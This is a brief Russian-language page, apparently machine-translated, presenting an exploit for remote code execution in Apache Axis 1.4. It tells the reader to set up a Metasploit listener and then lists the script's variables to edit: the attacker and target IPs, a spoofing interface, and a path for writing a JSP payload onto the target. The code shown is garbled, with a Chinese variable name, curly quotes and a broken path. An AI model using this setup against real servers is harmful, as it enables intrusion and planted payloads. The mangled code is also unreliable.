
Уязвимость удалённого выполнения кода в apache axis1.4
Уязвимость удаленного выполнения кода в Apache Axis 1.4 Необходимо настроить listener в msf на локальной машине, а также изменить строки 24-30 в коде
#Вам нужно изменить эти переменные в соответствии с вашей конфигурацией myip = “ 192.168.0.117 ” #IP-адрес вашей машины target = “ 192.168.0.102 ” #IP-адрес цели 网关= “ 192.168.0.1 ” #шлюз по умолчанию targetport = “ 8080 ” #порт, на котором целевой сервер запускает Axis (вероятно, 8080) pathtoaxis = “ http://192.168.0.102:8080/axis ” #это может быть нестандартный путь установки Axis, но это значение по умолчанию spoofinterface = “ eth0 ” #интерфейс для подмены (spoofing) jspwritepath = “ webapps \ axis \ exploit.jsp ” #относительный путь для записи JSP-пейлоада на целевой машине; это путь по умолчанию для установки Tomcat